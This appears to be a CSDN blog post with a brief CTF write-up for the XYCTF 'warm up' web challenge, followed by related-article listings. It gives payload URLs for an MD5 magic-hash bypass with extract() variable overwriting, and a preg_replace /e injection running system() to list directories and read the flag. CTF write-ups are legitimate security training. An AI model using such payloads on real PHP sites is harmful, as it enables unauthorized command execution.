[XYCTF新生赛]-Web:warm up(md5绕过,preg_replace()任意命令执行)

已于 2024-05-03 00:29:30 修改
阅读量64 收藏
点赞数 2
分类专栏: Web 文章标签: 网络安全 安全
于 2024-04-05 22:47:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/137409266
版权

查看网页

第一部分的payload:

http://xyctf.top:44891?val1=QNKCDZO&&val2=aabg7XSs&&md5=0e215962017&&XY=QNKCDZO&&XYCTF=QNKCDZO

这里解释一下extract($_GET);,如果我们通过get方式传输已有值的变量,那就会覆盖原有变量

第二部分的payload:

http://xyctf.top:44891/LLeeevvveeelll222.php?a=/test/e&&b=system('cd ../../../;ls;cat flag')&&c=just%20test

clxhzg
关注
专栏目录
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5811
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
php中preg replace,php函数preg_replace()
weixin_29531989的博客
03-24 1336
preg_replace 函数执行一个正则表达式的搜索和替换。语法mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。参数说明...
MoveCTF 2024参与指南
Sui_Network的博客
12-28 1223
手把手教你如何参与MoveCTF 2024
2024 XYCTF writeup
qq_74349936的博客
04-29 1571
参加了XYCTF,没写几道题,但还是在此记录一下。有什么不对的地方欢迎指正。(吐槽一下,比做了几天后就做不动了,一个月时间是真的长。不想做了,不过这篇WP还是定在了比结束再发)
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行
Onlyone_1314的博客
01-01 2952
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
preg_replace与远程代码执行
m0_62422842的博客
04-01 4028
前言 之前在攻防世界上随便做了个题,发现了这个陌生的preg_replace函数\e情况下的漏洞。像我这种对这陌生的小白来说第一次理解是比较困难的。花了两天时间看了许多师傅的文章,这才理解。为此写下这篇文章总结一下,也希望后上路的小伙伴能看了我的文章能有所收获。 preg_replace函数 这个php函数是通过正则替换用的,基本形式为 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject ) pr
注意到函数preg_replace_callback和preg_replace
Sp4rkW的博客
02-05 2136
前言 先知论坛上今早看到这样一篇文章,Discuz!因Memcached未授权访问导致的RCE,仔细阅读了下,核心点感觉还是一个对preg_replace_callback和preg_replace的利用,之前其实学习过程中并没有注意到这么一个点,这里做一些记录,和大家共同学习 preg_replace preg_replace函数解释 mixed preg_replace (
关于preg_replace \e的代码执行
m0_64815693的博客
04-23 1770
关于preg_replace \e的代码执行
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
`preg_replace()` 函数用于在字符串中执行正则表达式的搜索和替换操作。其基本语法如下: ```php string preg_replace ( mixed $pattern, mixed $replacement, mixed $subject [, int $limit = -1 ] [, int &$count...
深入研究PHP中的preg_replace和代码执行
10-18
这些示例表明,只有在正确的构造和特定的条件下,才能够成功地利用preg_replace/e模式执行代码。例如,如果正则表达式匹配失败(如由于字符被替换为下划线导致的),则代码执行将不会发生。 总结来说,文章深入分析...
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
PHP 正则表达式之正则处理函数小结(preg_match,preg_match_all,preg_replace,preg_split)
12-19
在前面我们也说过,基于perl的正则表达式要快于POXIS正则表达式处理函数,所以我们只介绍以preg开头的基于perl的正则表达式。注意:在能偶使用字符串函数处理的时候,就不要使用正则表达式来处理字符串,因为字符串...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1131
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 651
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1241
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安全服务面试
m0_74402888的博客
09-28 552
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值